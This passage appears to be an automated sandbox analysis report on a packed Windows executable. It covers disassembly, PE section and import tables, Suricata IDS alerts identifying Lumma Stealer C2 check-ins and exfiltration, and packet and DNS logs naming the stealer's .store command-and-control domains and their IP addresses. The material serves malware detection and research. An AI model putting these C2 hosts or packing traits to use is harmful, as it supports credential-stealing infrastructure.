                                                                        add byte ptr [eax], al
                                                                        add byte ptr [0000000Ah], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], dh
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax+00000000h], cl
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [edx], ah
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], cl
                                                                        add byte ptr [eax], 00000000h
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        adc byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        pop es
                                                                        or al, byte ptr [eax]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x340.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        0x10000x580000x27e000f5988916bca55384bab29e40a414261False0.9981938185736677data7.985188315102083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0x590000x3400x400914cd139a383496d0085d499d138ef92False0.390625data4.997389973748798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        syfhwmyd0x5b0000x2ab0000x2aae00ba51a52a14ab6a3384dff8d9c31608dcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        vfrwkpsf0x3060000x10000x400037b8397edf45c8d6af1ad0ecfb54a27False0.7734375data6.057096526179851IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .taggant0x3070000x30000x2200b6df059bc8cfe30ef1630703fa9b1998False0.07295496323529412DOS executable (COM)0.7030721830436618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_MANIFEST0x590580x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397

                                                                        Imports

                                                                        DLLImport
                                                                        kernel32.dlllstrcpy

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-10-30T06:15:59.318552+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.5631131.1.1.153UDP
                                                                        2024-10-30T06:15:59.541033+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.5632501.1.1.153UDP
                                                                        2024-10-30T06:15:59.573155+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.5577361.1.1.153UDP
                                                                        2024-10-30T06:15:59.584908+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.5595971.1.1.153UDP
                                                                        2024-10-30T06:15:59.596182+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.5524801.1.1.153UDP
                                                                        2024-10-30T06:16:00.238748+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549704188.114.96.3443TCP
                                                                        2024-10-30T06:16:01.272406+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704188.114.96.3443TCP
                                                                        2024-10-30T06:16:01.272406+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704188.114.96.3443TCP
                                                                        2024-10-30T06:16:01.952542+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549705188.114.96.3443TCP
                                                                        2024-10-30T06:16:02.433640+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705188.114.96.3443TCP
                                                                        2024-10-30T06:16:02.433640+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.96.3443TCP
                                                                        2024-10-30T06:16:03.419365+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549706188.114.96.3443TCP
                                                                        2024-10-30T06:16:04.820527+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549707188.114.96.3443TCP
                                                                        2024-10-30T06:16:05.357470+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549707188.114.96.3443TCP
                                                                        2024-10-30T06:16:06.125733+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549708188.114.96.3443TCP
                                                                        2024-10-30T06:16:07.654384+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549709188.114.96.3443TCP
                                                                        2024-10-30T06:16:09.165357+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549710188.114.96.3443TCP
                                                                        2024-10-30T06:16:11.282563+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.549711188.114.96.3443TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 30, 2024 06:15:59.617260933 CET49704443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:15:59.617300034 CET44349704188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:15:59.617418051 CET49704443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:15:59.618510962 CET49704443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:15:59.618530035 CET44349704188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:00.238662958 CET44349704188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:00.238748074 CET49704443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:00.243539095 CET49704443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:00.243551970 CET44349704188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:00.243782997 CET44349704188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:00.298105001 CET49704443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:00.590969086 CET49704443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:00.590969086 CET49704443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:00.591070890 CET44349704188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:01.272361040 CET44349704188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:01.272427082 CET44349704188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:01.272608995 CET49704443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:01.273899078 CET49704443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:01.273919106 CET44349704188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:01.273960114 CET49704443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:01.273966074 CET44349704188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:01.342372894 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:01.342403889 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:01.342492104 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:01.342760086 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:01.342771053 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:01.952317953 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:01.952542067 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:01.954154015 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:01.954161882 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:01.954678059 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:01.955930948 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:01.955960989 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:01.955987930 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.433553934 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.433585882 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.433609009 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.433640003 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.433664083 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.433763981 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.433763981 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.433779955 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.433824062 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.433849096 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.433880091 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.433924913 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.433929920 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.439014912 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.439074039 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.439079046 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.485694885 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.551278114 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.551356077 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.551378012 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.551440954 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.551548004 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.551548004 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.551685095 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.551695108 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.551704884 CET49705443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.551708937 CET44349705188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.657124043 CET49706443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.657170057 CET44349706188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:02.657244921 CET49706443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.657897949 CET49706443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:02.657913923 CET44349706188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:03.419279099 CET44349706188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:03.419364929 CET49706443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:03.424014091 CET49706443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:03.424034119 CET44349706188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:03.424216032 CET44349706188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:03.469985008 CET49706443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:03.475195885 CET49706443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:03.475341082 CET49706443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:03.475368977 CET44349706188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:03.999932051 CET44349706188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:04.000017881 CET44349706188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:04.000082970 CET49706443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:04.000169992 CET49706443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:04.000189066 CET44349706188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:04.193784952 CET49707443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:04.193818092 CET44349707188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:04.193907022 CET49707443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:04.194185972 CET49707443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:04.194197893 CET44349707188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:04.820332050 CET44349707188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:04.820527077 CET49707443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:04.821655989 CET49707443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:04.821662903 CET44349707188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:04.822228909 CET44349707188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:04.823456049 CET49707443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:04.823582888 CET49707443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:04.823612928 CET44349707188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:04.823678017 CET49707443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:04.823683023 CET44349707188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:05.357376099 CET44349707188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:05.357441902 CET44349707188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:05.357714891 CET49707443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:05.357883930 CET49707443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:05.357894897 CET44349707188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:05.517889977 CET49708443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:05.517935038 CET44349708188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:05.517998934 CET49708443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:05.518359900 CET49708443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:05.518376112 CET44349708188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:06.125673056 CET44349708188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:06.125732899 CET49708443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:06.127240896 CET49708443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:06.127254963 CET44349708188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:06.127518892 CET44349708188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:06.128633022 CET49708443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:06.128787041 CET49708443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:06.128820896 CET44349708188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:06.128886938 CET49708443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:06.128896952 CET44349708188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:06.735317945 CET44349708188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:06.735408068 CET44349708188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:06.735466003 CET49708443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:06.735690117 CET49708443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:06.735711098 CET44349708188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:07.046030998 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:07.046120882 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:07.046220064 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:07.046742916 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:07.046793938 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:07.654298067 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:07.654383898 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:07.655587912 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:07.655612946 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:07.656064987 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:07.657164097 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:07.657258987 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:07.657270908 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:08.088340998 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:08.088455915 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:08.088524103 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:08.088629007 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:08.088671923 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:08.555221081 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:08.555262089 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:08.555334091 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:08.555608988 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:08.555624008 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.165268898 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.165357113 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.166656017 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.166666031 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.166909933 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.168113947 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.168766975 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.168800116 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.168889999 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.168924093 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169012070 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169049978 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169161081 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169183969 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169297934 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169327021 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169440031 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169464111 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169471025 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169492960 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169589043 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169615984 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169635057 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169646978 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169739962 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169763088 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169783115 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.174591064 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.174719095 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.174753904 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.174771070 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.174793005 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.185291052 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:10.961822033 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:10.961941004 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:10.961996078 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:10.962069988 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:10.962089062 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:10.998959064 CET49711443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:10.999033928 CET44349711188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:10.999125957 CET49711443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:10.999411106 CET49711443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:10.999444008 CET44349711188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:11.282562971 CET49711443192.168.2.5188.114.96.3

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 30, 2024 06:15:59.318552017 CET6311353192.168.2.51.1.1.1
                                                                        Oct 30, 2024 06:15:59.536302090 CET53631131.1.1.1192.168.2.5
                                                                        Oct 30, 2024 06:15:59.541033030 CET6325053192.168.2.51.1.1.1
                                                                        Oct 30, 2024 06:15:59.550151110 CET53632501.1.1.1192.168.2.5
                                                                        Oct 30, 2024 06:15:59.573154926 CET5773653192.168.2.51.1.1.1
                                                                        Oct 30, 2024 06:15:59.582647085 CET53577361.1.1.1192.168.2.5
                                                                        Oct 30, 2024 06:15:59.584908009 CET5959753192.168.2.51.1.1.1
                                                                        Oct 30, 2024 06:15:59.593558073 CET53595971.1.1.1192.168.2.5
                                                                        Oct 30, 2024 06:15:59.596182108 CET5248053192.168.2.51.1.1.1
                                                                        Oct 30, 2024 06:15:59.612287045 CET53524801.1.1.1192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Oct 30, 2024 06:15:59.318552017 CET192.168.2.51.1.1.10xbd8fStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                        Oct 30, 2024 06:15:59.541033030 CET192.168.2.51.1.1.10x61e3Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                        Oct 30, 2024 06:15:59.573154926 CET192.168.2.51.1.1.10x5d3aStandard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                        Oct 30, 2024 06:15:59.584908009 CET192.168.2.51.1.1.10x5a2dStandard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                        Oct 30, 2024 06:15:59.596182108 CET192.168.2.51.1.1.10xf4f7Standard query (0)necklacedmny.storeA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Oct 30, 2024 06:15:59.536302090 CET1.1.1.1192.168.2.50xbd8fName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                        Oct 30, 2024 06:15:59.550151110 CET1.1.1.1192.168.2.50x61e3Name error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                        Oct 30, 2024 06:15:59.582647085 CET1.1.1.1192.168.2.50x5d3aName error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                        Oct 30, 2024 06:15:59.593558073 CET1.1.1.1192.168.2.50x5a2dName error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                        Oct 30, 2024 06:15:59.612287045 CET1.1.1.1192.168.2.50xf4f7No error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false
                                                                        Oct 30, 2024 06:15:59.612287045 CET1.1.1.1192.168.2.50xf4f7No error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false
                                                                        Oct 30, 2024 06:16:16.739851952 CET1.1.1.1192.168.2.50xe603No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                        Oct 30, 2024 06:16:16.739851952 CET1.1.1.1192.168.2.50xe603No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • necklacedmny.store

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
